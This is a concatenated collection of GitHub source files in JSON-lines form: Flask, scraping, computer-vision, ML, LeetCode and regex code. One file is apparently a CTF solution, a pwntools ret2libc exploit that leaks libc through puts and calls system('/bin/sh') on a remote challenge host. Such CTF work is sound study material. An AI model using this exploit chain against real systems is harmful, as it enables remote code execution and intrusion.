INTO compras (date,time,from_currency,from_quantity,to_currency,to_quantity,P_U) values (?,?,?,?,?,?,?);\"\n\t\t\t\t\t\t\t\tdatos =(now.date(),time,request.values.get('MonedaFrom'), request.values.get('MonedaTo'), request.values.get('Q_Form'),round(float(form.Q_to.data), 8),round(float(form.P_U.data), 8))\n\n\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\tcur.execute(query,datos)\n\t\t\t\t\t\t\t\t\t\tconn.commit()\n\t\t\t\t\t\t\t\t\t\treturn redirect(url_for(\"index\"))\t\n\n\t\t\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\t\t\t\terrorbd = ('Error de acceso a la base de datos: {}'.format(e))\n\t\t\t\t\t\t\t\t\t\treturn render_template('compras.html',form=form, error_bd=errorbd)\n\n\t\t\t\t\t\t\t\tconn.close()\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tfor moneda in monedas:\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tif moneda != 'EUR':\n\t\t\t\t\t\t\t\t\t\tif saldoFrom[0] is not None or saldoTo[0] is not None:\n\n\t\t\t\t\t\t\t\t\t\t\t\tif saldoFrom[0] is not None and saldoTo[0] is not None:\n\t\t\t\t\t\t\t\t\t\t\t\t\tsaldo = saldoFrom[0] - saldoTo[0]\n\n\t\t\t\t\t\t\t\t\t\t\t\telif saldoFrom[0] == None and saldoTo[0] is not None:\n\t\t\t\t\t\t\t\t\t\t\t\t\tsaldo = saldoTo[0]\n\n\t\t\t\t\t\t\t\t\t\t\t\telif saldoFrom[0] is not None and saldoTo[0]== None:\n\t\t\t\t\t\t\t\t\t\t\t\t\tsaldo = saldoFrom[0]\n\n\t\t\t\t\t\t\t\t\t\tCantidad = float(request.values.get('Q_Form'))\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\tif saldo >= Cantidad:\n\t\t\t\t\t\t\t\t\t\t\t\tquery = \"INSERT INTO compras (date,time,from_currency,from_quantity,to_currency,to_quantity,P_U) values (?,?,?,?,?,?,?);\"\n\t\t\t\t\t\t\t\t\t\t\t\tdatos =(now.date(),time,request.values.get('MonedaFrom'), request.values.get('MonedaTo'), request.values.get('Q_Form'),round(float(form.Q_to.data), 8),round(float(form.P_U.data), 
8))\n\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\terrorsaldo = ('Saldo insuficiente. No tienes suficiente cantidad de {} para comprar: {} - {}. Por favor, intentalo con una cantidad menor o con otra criptomoneda de la que disponga con más saldo.'.format(request.values.get('MonedaFrom'),request.values.get('Q_Form'),request.values.get('MonedaTo')))\n\t\t\t\t\t\t\t\t\t\t\treturn render_template('compras.html',form=form, error_saldo=errorsaldo)\n\t\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\tcur.execute(query,datos)\n\t\t\t\t\t\t\t\t\t\tconn.commit()\n\t\t\t\t\t\t\t\t\t\treturn redirect(url_for(\"index\"))\t\n\n\t\t\t\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\t\t\t\terrorbd = ('Error de acceso a la base de datos: {}'.format(e))\n\t\t\t\t\t\t\t\t\t\treturn render_template('compras.html',form=form, error_bd=errorbd)\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tconn.close()\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\terrormoneda = ('No tienes saldo de esta moneda, intenta comprar con alguna moneda de las que dispongas saldo')\n\t\t\t\t\t\t\t\treturn render_template('compras.html',form=form, error_moneda=errormoneda)\n\n\t\t\t\t\t\t\t\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\treturn render_template('compras.html',form=form)\n\n\n@app.route(\"/status\")\ndef status():\n\tconn = sqlite3.connect(app.config['BASE_DATOS'])\n\tcur = conn.cursor()\n\t\n\ttry:\n\t\t\t## Conocer la Inversión Atrapada\n\t\t\tconsultasaldo = \"SELECT sum(to_quantity) from compras WHERE from_quantity = 'EUR'\"\n\t\t\tsaldoEuros=cur.execute(consultasaldo).fetchall()\n\t\t\tsaldoenEuros = saldoEuros[0]\n\t\t\t\n\t\t\tconsultasaldo = \"SELECT sum(to_currency) from compras WHERE from_currency = 'EUR'\"\n\t\t\tinvierteEuros=cur.execute(consultasaldo).fetchall()\n\t\t\tInvierteEuros = invierteEuros[0]\n\n\t\t\tMonedas = (\"BTC\", \"ETH\", \"XRP\", \"LTC\", \"BCH\", \"BNB\", \"USDT\", \"EOS\", \"BSV\", \"XLM\", \"ADA\", \"TRX\")\n\t\t\t\n\t\t\t## Almacenar la Inversión Atrapada\n\t\t\td = {}\n\t\t\tfor moneda in Monedas: \n\t\t\t\tconsultacryto = \"SELECT sum(to_quantity) from compras WHERE from_quantity = '{}'\".format(moneda)\n\t\t\t\tcompraCrypto=cur.execute(consultacryto).fetchall()\n\t\t\t\tcompracrypto = compraCrypto[0]\n\n\t\t\t\tconsultacrypto = \"SELECT sum(to_currency) from compras WHERE from_currency = '{}'\".format(moneda)\n\t\t\t\tinvierteCrypto=cur.execute(consultacrypto).fetchall()\n\t\t\t\tICrypto = invierteCrypto[0]\n\n\t\t\t\tif compracrypto[0] is not None or ICrypto[0] is not None:\n\n\t\t\t\t\tif compracrypto[0] and ICrypto[0] is not None:\n\t\t\t\t\t\td[moneda] = compracrypto[0] - ICrypto[0]\n\n\t\t\t\t\telif compracrypto[0] == None and ICrypto[0] is not None:\n\t\t\t\t\t\td[moneda] = ICrypto[0]\n\n\t\t\t\t\telse:\n\t\t\t\t\t\td[moneda] = compracrypto[0]\n\t\t\t\t\n\n\t\t\t## Convertir a Euros la Inversión Atrapada\n\t\t\tEuros = []\n\t\t\tfor key in d:\n\n\t\t\t\tAPY = app.config['APY_KEY']\n\t\t\t\tURL = 'https://pro-api.coinmarketcap.com/v1/tools/price-conversion?amount={}&symbol={}&convert=EUR&CMC_PRO_API_KEY={}'\n\t\t\t\trespuesta = requests.get(URL.format(d.get(key),key,APY))\n\t\t\t\tjson = respuesta.json()\n\t\t\t\tEuros.append(json.get('data').get('quote').get('EUR')['price'])\n\n\t\t\tSumaEuros = sum(Euros)\n\t\t\tIAEuros = round(SumaEuros,2)\n\n\t\t\t#Calcular el Valor Actual de la cantidad Invertida\n\n\t\t\tif saldoenEuros[0] == None:\n\t\t\t\tvalorActual = InvierteEuros[0] + IAEuros\n\n\t\t\telif InvierteEuros[0] == None:\n\t\t\t\tvalorActual = 
saldoenEuros[0] + IAEuros\n\n\t\t\telse:\n\t\t\t\tvalorActual = saldoenEuros[0] + InvierteEuros[0] + IAEuros\n\n\t\n\t\t\treturn render_template('estado.html', saldoenEuros= InvierteEuros[0], valorActual = round(valorActual,2))\n\n\t\t\t\n\texcept Exception as e:\n\t\t\t\t\terror_acceso = ('Se ha producido un error de acceso a la base de datos: {}'.format(e))\n\t\t\t\t\treturn render_template('estado.html', acceso_base_datos= error_acceso)\n\n\tconn.close()\n\n\n\n\n\n\n","repo_name":"isagomezgalvez-hub/Proyecto_boot_z_5","sub_path":"the_app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":8775,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17630918268","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.firefox.options import Options\nimport time\nimport json\nfrom decimal import Decimal\nfrom dish import Dish\nfrom dynamodb_write import DynamoDBWrite\nfrom write_to_s3_parquet import WriteS3Parquet\nimport datetime\nfrom dish_info import DishInfo\n\n\nclass BehrouzBiryani:\n\n def __init__(self, url=None):\n \n self.CONFIG_FILE = \"jwt-config.json\"\n with open(self.CONFIG_FILE,'r') as config_file:\n self.data_set = json.load(config_file)\n\n self.starter_config = self.data_set['BEHROUZ_BIRYANI']['CONFIG']['STARTER']\n self.config = self.data_set['BEHROUZ_BIRYANI']['CONFIG']\n self.dish_config = self.data_set['BEHROUZ_BIRYANI']['CONFIG']['DISH']\n self.options = Options()\n self.options.headless = True\n self.driver = webdriver.Firefox(options=self.options)\n self.url = self.starter_config[\"URL\"]\n self.city = 'general'\n self.country = 'india'\n self.city_code = self.city+'__'+self.country\n self.all_dishes_url = []\n self.restaurant_obj = {}\n\n \n\n def get_details(self):\n\n try:\n self.driver.get(self.url)\n\n try:\n FIND_BY = self.dish_config['SELECTORS']['WAIT']['FIND_BY']\n VALUE = self.dish_config['SELECTORS']['WAIT']['VALUE']\n\n if FIND_BY == 'class':\n element = WebDriverWait(self.driver, 10).until(\n EC.visibility_of_element_located((By.CLASS_NAME, VALUE))\n )\n elif FIND_BY == 'id':\n element = WebDriverWait(self.driver, 10).until(\n EC.visibility_of_element_located((By.ID, VALUE))\n )\n elif FIND_BY == 'tag':\n element = WebDriverWait(self.driver, 10).until(\n EC.visibility_of_element_located((By.TAG_NAME, VALUE))\n )\n\n IMAGE_CONTAINER = {\n 'FIND_BY': self.starter_config['SELECTORS']['IMAGE_CONTAINER']['FIND_BY'],\n 'VALUE' : self.starter_config['SELECTORS']['IMAGE_CONTAINER']['VALUE']\n }\n \n CTG_NAV = {\n 'FIND_BY': self.dish_config['SELECTORS']['CATEGORY_NAV']['FIND_BY'],\n 'VALUE' : self.dish_config['SELECTORS']['CATEGORY_NAV']['VALUE']\n }\n CATEGORIES = {\n 'FIND_BY': self.dish_config['SELECTORS']['CATEGORIES']['FIND_BY'],\n 'VALUE' : self.dish_config['SELECTORS']['CATEGORIES']['VALUE']\n }\n\n # if IMAGE_CONTAINER['FIND_BY'] == 'class':\n # image_container = driver.find_element_by_class_name(IMAGE_CONTAINER['VALUE'])\n # elif IMAGE_CONTAINER['FIND_BY'] == 'id':\n # image_container = driver.find_element_by_id(IMAGE_CONTAINER['VALUE'])\n # elif IMAGE_CONTAINER['FIND_BY'] == 'tag':\n # image_container = driver.find_element_by_tag_name(IMAGE_CONTAINER['VALUE'])\n\n # image = image_container.get_attribute('src')\n # print('++++++++',image)\n\n if CTG_NAV['FIND_BY'] == 'class':\n ctg_nav = 
self.driver.find_element_by_class_name(CTG_NAV['VALUE'])\n elif CTG_NAV['FIND_BY'] == 'id':\n ctg_nav = self.driver.find_element_by_id(CTG_NAV['VALUE'])\n elif CTG_NAV['FIND_BY'] == 'tag':\n ctg_nav = self.driver.find_element_by_tag_name(CTG_NAV['VALUE'])\n\n if CATEGORIES['FIND_BY'] == 'class':\n categories = ctg_nav.find_elements_by_class_name(CATEGORIES['VALUE'])\n elif CATEGORIES['FIND_BY'] == 'id':\n categories = ctg_nav.find_element_by_id(CATEGORIES['VALUE'])\n elif CATEGORIES['FIND_BY'] == 'tag':\n categories = ctg_nav.find_elements_by_tag_name(CATEGORIES['VALUE'])\n\n self.restaurant_obj = {\n 'city_code':self.city_code,\n 'name':\"Behrouz Biryani\",\n 'type':\"Biryani, Mughlai\",\n 'stars':4.1,\n 'ratings':\"100+ Ratings\",\n 'image':\"https://product-assets.faasos.io/production/product/image_1562244587528_brz_june_mehfil.jpg\",\n 'opens_at':None,\n 'country':self.country,\n 'city':self.city,\n 'subzone':'General',\n 'platform':'Behrouz Biryani',\n 'dishes':[],\n 'added_on': str(datetime.datetime.utcnow())\n }\n\n\n self.dish_obj = Dish(self.driver, self.dish_config)\n\n for ctg in categories:\n id = ctg.get_attribute('id')\n category = ctg.text\n # print('*****',id,category)\n self.dish_obj.get_dishes(ctg, self.all_dishes_url)\n\n \n self.get_all_dishes_info(self.all_dishes_url)\n print('********',self.restaurant_obj,len(self.restaurant_obj['dishes']))\n sort_key_info = self.restaurant_obj['platform']+'__'+self.restaurant_obj['subzone']+'__'+self.restaurant_obj['name'].strip().replace(' ','_')\n self.restaurant_obj['sort_key_info'] = sort_key_info\n self.restaurant_obj['stars'] = Decimal(str(self.restaurant_obj['stars']))\n\n # write to dynamodb\n self.dynamodb_write_obj = DynamoDBWrite()\n self.dynamodb_write_obj.dynamodb_write(self.restaurant_obj)\n \n\n # # write data to parquet in s3\n self.restaurant_obj['stars'] = float(self.restaurant_obj['stars'])\n self.write_to_s3_parquet_obj = WriteS3Parquet(self.city)\n self.write_to_s3_parquet_obj.write_to_parquet(self.restaurant_obj)\n \n \n except Exception as e:\n print('++++++++NOT DONE',e)\n\n \n self.driver.close()\n \n except Exception as e:\n print('+++++++Exception while contents of given url',e)\n\n \n def get_all_dishes_info(self, all_dishes_url):\n\n for url in all_dishes_url:\n dish_info_obj = DishInfo(self.driver, self.dish_config)\n main_window = self.driver.current_window_handle\n self.driver.execute_script(\"window.open('');\")\n time.sleep(1)\n self.driver.switch_to.window(self.driver.window_handles[1])\n dish_info_obj.get_dish_info(url, self.restaurant_obj)\n self.driver.close()\n self.driver.switch_to_window(main_window)\n \n\nif __name__ == '__main__':\n\n behrouzBiryani = BehrouzBiryani(\"https://www.behrouzbiryani.com/bangalore/residency-road\")\n \n behrouzBiryani.get_details()\n","repo_name":"kumawat0008/web-scraping","sub_path":"behrouzbiryani/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73181045352","text":"\n#2,3,5에다��� 235를 계속 곱해야함\n# 4 6 10 6 9 15\nlst = [1,2,3,5]\nN = int(input())\nplg = 0\nwhile True:\n for i in lst:\n if 2*i not in lst:\n lst.append(2*i)\n if 3*i not in lst:\n lst.append(3*i)\n if 5 * i not in lst:\n lst.append(5*i)\n if 1000 in lst:\n plg = 1\n break\n if plg == 1:\n break\nlst.sort()\nprint(lst[N-1])","repo_name":"Younggil-kim/Algorithm_with_python","sub_path":"DP/못생긴 수_381page.py","file_name":"못생긴 
수_381page.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5056362633","text":"\r\nimport cv2\r\n\r\n\r\ncap = cv2.VideoCapture(\"a.mp4\")\r\n\r\nfourcc = cv2.VideoWriter_fourcc(*'h263')\r\nout = cv2.VideoWriter('cv2_cameraaa_output.mp4',fourcc, 20.0, (800,600))\r\n\r\n\r\nwhile True:\r\n ret, frame = cap.read()\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n cv2.imshow('frame', frame)\r\n cv2.imshow('gray', gray)\r\n frame = cv2.resize(frame,(800,600))\r\n out.write(frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n\r\ncap.release()\r\nout.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"rravicha/PyRep","sub_path":"mohan_pgm/Python-Sample/Python_Experiements/cv2video.py","file_name":"cv2video.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71856458473","text":"#!/usr/bin/env python\n\n##############\n#### Your name: Yingqi Chen\n##############\n\nimport numpy as np\nimport re, math\nfrom sklearn import svm, metrics\nfrom skimage import io, feature, filters, exposure, color, measure, transform\nimport ransac_score\n\nclass ImageClassifier:\n \n def __init__(self):\n self.classifier = None\n\n def imread_convert(self, f):\n return io.imread(f).astype(np.uint8)\n\n def load_data_from_folder(self, dir):\n # read all images into an image collection\n ic = io.ImageCollection(dir+\"*.bmp\", load_func=self.imread_convert)\n \n #create one large array of image data\n data = io.concatenate_images(ic)\n \n #extract labels from image names\n labels = np.array(ic.files)\n for x, y in enumerate(labels):\n m = re.search(\"_\", y)\n labels[x] = y[len(dir):m.start()]\n \n return(data,labels)\n \n def extract_image_features(self, data):\n # Please do not modify the header above\n\n\n ########################\n ######## YOUR CODE HERE\n ########################\n # extract feature vector from image data\n arr = []\n for im in data:\n im_gray = color.rgb2gray(im)\n \n im_gray = filters.gaussian(im_gray, sigma=0.4)\n \n f = feature.hog(im_gray, orientations=10, pixels_per_cell=(48, 48), cells_per_block=(4, 4), feature_vector=True, block_norm='L2-Hys')\n arr.append(f)\n \n\n feature_data = np.array(arr)\n return(feature_data)\n \n \n def train_classifier(self, train_data, train_labels):\n # Please do not modify the header above\n\n # train model and save the trained model to self.classifier\n\n ########################\n ######## YOUR CODE HERE\n ########################\n self.classifer = svm.LinearSVC()\n self.classifer.fit(train_data, train_labels)\n\n def predict_labels(self, data):\n # Please do not modify the header\n\n # predict labels of test data using trained model in self.classifier\n # the code below expects output to be stored in predicted_labels\n\n ########################\n ######## YOUR CODE HERE\n ########################\n predicted_labels = self.classifer.predict(data)\n return predicted_labels\n\n def line_fitting(self, data):\n # Please do not modify the header\n\n # fit a line the to arena wall using RANSAC\n # return two lists containing slopes and y intercepts of the line\n\n ########################\n ######## YOUR CODE HERE\n ########################\n slope = []\n intercept = []\n\n for img in data:\n # Convert the image to grayscale\n gray_image = color.rgb2gray(img)\n\n # Apply Gaussian filter with sigma around 3\n smoothed_image = 
filters.gaussian(gray_image, sigma=3)\n\n # Perform edge detection using Canny\n edges = feature.canny(smoothed_image)\n\n # Extract coordinates of edge pixels\n edge_coords = np.column_stack(np.where(edges))\n\n # Extract x and y coordinates\n x_coords = edge_coords[:, 1]\n y_coords = edge_coords[:, 0]\n\n # Perform RANSAC-based line fitting\n # In this case, the acceptable_dist changed from 1.0 to 0.5 will resolve the line fitting issue\n slopes, intercepts = self.ransac_line_fit(x_coords, y_coords, num_samples=2, repeats=1000,\n acceptable_dist=0.5)\n\n slope.append(slopes)\n intercept.append(intercepts)\n\n # Please do not modify the return type below\n return slope, intercept\n\n def ransac_line_fit(self, x_coord, y_coord, num_samples, repeats, acceptable_dist):\n best_slope = None\n best_intercept = None\n max_inliers = 0\n\n for _ in range(repeats):\n # Choose a random set of points\n random_indices = np.random.choice(len(x_coord), num_samples, replace=False)\n x_subset = x_coord[random_indices]\n y_subset = y_coord[random_indices]\n\n # Fit a line to the random subset of points\n line = np.polyfit(x_subset, y_subset, 1)\n slope, intercept = line[0], line[1]\n\n # Calculate perpendicular distances from the line\n distances = np.abs(y_coord - (slope * x_coord + intercept))\n\n # Count inliers (points close to the line)\n inliers = np.sum(distances <= acceptable_dist)\n\n # Update best model if this model is better\n if inliers > max_inliers:\n max_inliers = inliers\n best_slope, best_intercept = slope, intercept\n\n return best_slope, best_intercept\n\ndef main():\n\n img_clf = ImageClassifier()\n\n # load images\n (train_raw, train_labels) = img_clf.load_data_from_folder('./train/')\n (test_raw, test_labels) = img_clf.load_data_from_folder('./test/')\n (wall_raw, _) = img_clf.load_data_from_folder('./wall/')\n \n # convert images into features\n train_data = img_clf.extract_image_features(train_raw)\n test_data = img_clf.extract_image_features(test_raw)\n \n # train model and test on training data\n img_clf.train_classifier(train_data, train_labels)\n predicted_labels = img_clf.predict_labels(train_data)\n print(\"\\nTraining results\")\n print(\"=============================\")\n print(\"Confusion Matrix:\\n\",metrics.confusion_matrix(train_labels, predicted_labels))\n print(\"Accuracy: \", metrics.accuracy_score(train_labels, predicted_labels))\n print(\"F1 score: \", metrics.f1_score(train_labels, predicted_labels, average='micro'))\n \n # test model\n predicted_labels = img_clf.predict_labels(test_data)\n print(\"\\nTest results\")\n print(\"=============================\")\n print(\"Confusion Matrix:\\n\",metrics.confusion_matrix(test_labels, predicted_labels))\n print(\"Accuracy: \", metrics.accuracy_score(test_labels, predicted_labels))\n print(\"F1 score: \", metrics.f1_score(test_labels, predicted_labels, average='micro'))\n\n # ransac\n print(\"\\nRANSAC results\")\n print(\"=============================\")\n s, i = img_clf.line_fitting(wall_raw)\n print(f\"Line Fitting Score: {ransac_score.score(s,i)}/10\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"yingqi955/inventory-image-recognition","sub_path":"imgclassification.py","file_name":"imgclassification.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31496458799","text":"import warnings\n\nclass XLNetConfig(object):\n def __init__(\n self,\n vocab_size=32000,\n d_model=1024,\n n_layer=24,\n n_head=16,\n 
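# note: d_model must be divisible by n_head (validated in the constructor body below); d_head is derived as d_model // n_head\n        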
d_inner=4096,\n ff_activation=\"gelu\",\n untie_r=True,\n attn_type=\"bi\",\n initializer_range=0.02,\n layer_norm_eps=1e-12,\n dropout=0.0,\n mem_len=512,\n reuse_len=None,\n use_mems_eval=True,\n use_mems_train=False,\n bi_data=False,\n clamp_len=-1,\n same_length=False,\n summary_type=\"last\",\n summary_use_proj=True,\n summary_activation=\"tanh\",\n summary_last_dropout=0.0,\n start_n_top=5,\n end_n_top=5,\n pad_token_id=5,\n bos_token_id=1,\n eos_token_id=2,\n output_attentions=False,\n output_hidden_states=False,\n chunk_size_feed_forward=0,\n num_labels=2,\n **kwargs\n ):\n\n self.vocab_size = vocab_size\n self.d_model = d_model\n self.n_layer = n_layer\n self.n_head = n_head\n if d_model % n_head != 0:\n raise ValueError(f\"'d_model % n_head' ({d_model % n_head}) should be equal to 0\")\n if \"d_head\" in kwargs:\n if kwargs[\"d_head\"] != d_model // n_head:\n raise ValueError(\n f\"`d_head` ({kwargs['d_head']}) should be equal to `d_model // n_head` ({d_model // n_head})\"\n )\n self.d_head = d_model // n_head\n self.ff_activation = ff_activation\n self.d_inner = d_inner\n self.untie_r = untie_r\n self.attn_type = attn_type\n\n self.initializer_range = initializer_range\n self.layer_norm_eps = layer_norm_eps\n\n self.dropout = dropout\n self.mem_len = mem_len\n self.reuse_len = reuse_len\n self.bi_data = bi_data\n self.clamp_len = clamp_len\n self.same_length = same_length\n\n self.summary_type = summary_type\n self.summary_use_proj = summary_use_proj\n self.summary_activation = summary_activation\n self.summary_last_dropout = summary_last_dropout\n self.start_n_top = start_n_top\n self.end_n_top = end_n_top\n\n self.bos_token_id = bos_token_id\n self.pad_token_id = pad_token_id\n self.eos_token_id = eos_token_id\n\n if \"use_cache\" in kwargs:\n warnings.warn(\n \"The `use_cache` argument is deprecated and will be removed in a future version, use `use_mems_eval`\"\n \" instead.\",\n FutureWarning,\n )\n use_mems_eval = kwargs[\"use_cache\"]\n\n self.use_mems_eval = use_mems_eval\n self.use_mems_train = use_mems_train\n self.pad_token_id = pad_token_id\n self.bos_token_id = bos_token_id\n self.eos_token_id = eos_token_id\n self.output_attentions = output_attentions\n self.output_hidden_states = output_hidden_states\n self.chunk_size_feed_forward = chunk_size_feed_forward\n self.num_labels = num_labels\n\n","repo_name":"sj1104/Hetu","sub_path":"examples/transformers/xlnet/xlnet_config.py","file_name":"xlnet_config.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"36213879334","text":"from preprocess import ColumnSumFilter, ColumnStdFilter, PolynomialTransformer\nfrom training import find_best_repository_classification\nfrom evaluation import get_cleaned_processed_df, drop_text_features\nfrom sklearn.pipeline import Pipeline\n\nif __name__ == '__main__':\n data_frame = get_cleaned_processed_df()\n data_frame = drop_text_features(data_frame)\n\n ppl = Pipeline([\n ('clmn_std_filter', ColumnStdFilter(min_std=10)),\n ('clmn_sum_filter', ColumnSumFilter(min_sum=10000)),\n ('poly_transf', PolynomialTransformer(degree=2))\n ])\n preprocessed_df = ppl.transform(data_frame)\n y_train = preprocessed_df.pop(\"label\")\n find_best_repository_classification(preprocessed_df, 
y_train)","repo_name":"WGierke/git_better","sub_path":"app/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"71621751273","text":"\nclass Solution:\n\n def minSubArrayLen(self, s, nums):\n\n total, left, res = 0, 0, float('inf')\n for i in range(len(nums)):\n total += nums[i]\n while left <= i and total >= s:\n res = min(res, i-left+1)\n total -= nums[left]\n left += 1\n if res == float('inf'):\n return 0\n else:\n return res\n\n # slide window\n\n def minSubArrayLen(self, s: int, nums: List[int]) -> int:\n if sum(nums) < s: return 0\n left, right, x = 0, 0, len(nums)+1\n res = 0\n while right < len(nums):\n while right < len(nums) and res < s:\n res += nums[right]\n right += 1\n while left < right and res >= s:\n x = min(x, right - left)\n res -= nums[left]\n left += 1\n return x\n ","repo_name":"thomasyu929/Leetcode","sub_path":"Array/minSizeSubarraySum.py","file_name":"minSizeSubarraySum.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6027213221","text":"\nimport re \ns = \"asdfjvjadsffvaadfkfasaffdsasdffadsafafsafdadsfaafd happy happy\"\n \nret = re.findall(r'\\bha[a-z]*' , s) #匹配的是单词的边界是ha加上[a-z]的字母以及*(后续任意个数的字符)\nprint(len(ret))\nprint(ret)\n\n#secondary\nscheme = re.compile(r'\\bha[a-z]*')\nret2 = scheme.findall('a happy happpppp sss',1,20)\nprint(ret2)","repo_name":"Sagiri-lzumi/python-learning-sharing","sub_path":"re正则表达式/re_findall.py","file_name":"re_findall.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17163493020","text":"from pwn import *\r\nfrom LibcSearcher import *\r\nimport sys\r\nremote_addr = [\"43.143.254.94\",10793]\r\nlibc=ELF('./libc-2.31.so')\r\nelf = ELF('./Safe_Program')\r\nif len(sys.argv) == 1:\r\n context.log_level=\"debug\" \r\n #p = process([\"qemu-aarch64\", \"-L\", \"/usr/aarch64-linux-gnu/\", \"-g\",\"1234\",\"./stack\"]) \r\n #p = process([\"qemu-aarch64\", \"-L\", \".\", \"./stack\"]) \r\n p = process(\"./Safe_Program_patched\")\r\n context(arch='amd64', os='linux')\r\nif len(sys.argv) == 2 :\r\n if 'r' in sys.argv[1]:\r\n p = remote(remote_addr[0],remote_addr[1])\r\n if 'n' not in sys.argv[1]:\r\n context.log_level=\"debug\" \r\n #context(arch = 'amd64', os = 'linux')\r\nr = lambda : p.recv()\r\nrl = lambda : p.recvline()\r\nrc = lambda x: p.recv(x)\r\nru = lambda x: p.recvuntil(x)\r\nrud = lambda x: p.recvuntil(x, drop=True)\r\ns = lambda x: p.send(x)\r\nsl = lambda x: p.sendline(x)\r\nsa = lambda x, y: p.sendafter(x, y)\r\nsla = lambda x, y: p.sendlineafter(x, y)\r\nshell = lambda : p.interactive()\r\npr = lambda name,x : log.info(name+':'+hex(x))\r\n\r\n#gdb.attach(p, '''\r\n# b *0x401245\r\n#''')\r\n\r\npop_rdi = 0x401393\r\nputs_got = elf.got['puts']\r\nputs_plt = elf.plt['puts']\r\nmain = 0x401247 \r\nret = 0x40101a\r\n\r\nru(b'now:\\n\\n')\r\npayload = b'a' * (0x80 + 8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)\r\ns(payload)\r\nleak_addr = u64(rc(6).ljust(8, b'\\x00'))\r\npr('leak_addr', leak_addr)\r\nlibc_base = leak_addr - libc.sym['puts']\r\npr('libc_base', libc_base)\r\nsystem = libc_base + libc.sym['system']\r\nbinsh = libc_base + next(libc.search(b'/bin/sh'))\r\n\r\nru(b'now:\\n\\n')\r\npayload = b'a' * (0x80 + 8) + p64(ret) + p64(pop_rdi) + p64(binsh) + 
p64(system)\r\ns(payload)\r\n\r\nshell()\r\n","repo_name":"BattiestStone4/pwn-problems","sub_path":"HSCCTF_Safe-Program/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"28484347254","text":"# https://leetcode.com/problems/queue-reconstruction-by-height/description/\n\nclass Solution:\n def reconstructQueue(self, people: List[List[int]]) -> List[List[int]]:\n queue = []\n \n for k, h in sorted([k, -h] for h, k in people):\n idx = 0\n front = k\n while idx < len(queue) and front > 0:\n if queue[idx][0] >= -h:\n front -= 1\n idx += 1\n queue.insert(idx, [-h, k])\n \n return queue\n \n","repo_name":"nawrazi/competitive-programming","sub_path":"week_58/queue-reconstruction-by-height.py","file_name":"queue-reconstruction-by-height.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30864577799","text":"class Solution:\n def missingNumber(self, arr: List[int]) -> int:\n l = len(arr)\n step = (arr[l - 1] - arr[0]) // l\n for i in range(l - 1):\n if arr[i + 1] - arr[i] != step:\n return arr[i] + step\n \n # if step is 0:\n return arr[0]","repo_name":"Maxwell-Yang-2001/maxwell-yang-leetcode","sub_path":"1228-missing-number-in-arithmetic-progression/1228-missing-number-in-arithmetic-progression.py","file_name":"1228-missing-number-in-arithmetic-progression.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73285159593","text":"# ICE Revision: $Id: TemplateFile.py,v de6dbd122d11 2020-02-25 11:02:08Z bgschaid $\n\nimport re\nfrom math import *\nimport sys\n\nfrom PyFoam.Error import error,warning\nfrom PyFoam.ThirdParty.pyratemp import Template as PyratempTemplate\nfrom PyFoam.ThirdParty.pyratemp import EvalPseudoSandbox,TemplateRenderError\nfrom PyFoam.ThirdParty.pyratemp import Renderer as PyratempRenderer\n\nfrom PyFoam.ThirdParty.six import iteritems,exec_,print_,PY3\n\nclass RendererWithFilename(PyratempRenderer):\n \"\"\"Usual renderer but report a filename\"\"\"\n\n def __init__(self, evalfunc, escapefunc,filename=None):\n PyratempRenderer.__init__(self, evalfunc, 